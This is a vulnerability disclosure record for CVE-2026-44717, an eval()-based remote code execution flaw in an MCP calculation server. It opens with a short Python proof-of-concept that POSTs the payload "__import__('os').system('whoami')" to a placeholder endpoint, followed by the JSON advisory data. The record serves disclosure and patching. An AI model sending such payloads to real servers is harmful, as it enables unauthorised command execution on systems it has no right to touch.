CVE-2026-44717

import requests # Target URL (Placeholder) target_url = "http://vulnerable-host:port/api/calculate" # Malicious payload to execute system command using Python's eval() # This payload demonstrates RCE by executing 'whoami' payload = "__import__('os').system('whoami')" # Send POST request with the malicious expression try: response = requests.post(target_url, json={"expression": payload}) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") except Exception as e: print(f"Exploit failed: {e}")

{"cve": {"id": "CVE-2026-44717", "sourceIdentifier": "[email protected]", "published": "2026-05-15T17:16:48.073", "lastModified": "2026-05-15T17:16:48.073", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "MCP Calculate Server is a mathematical calculation service based on MCP protocol and SymPy library. Prior to 0.1.1, the use of eval() to evaluate mathematical expressions without proper input sanitization leads to remote code execution. This vulnerability is fixed in 0.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/611711Dark/mcp_calculate_server/security/advisories/GHSA-2mgq-7rfg-rwpj", "source": "[email protected]"}]}}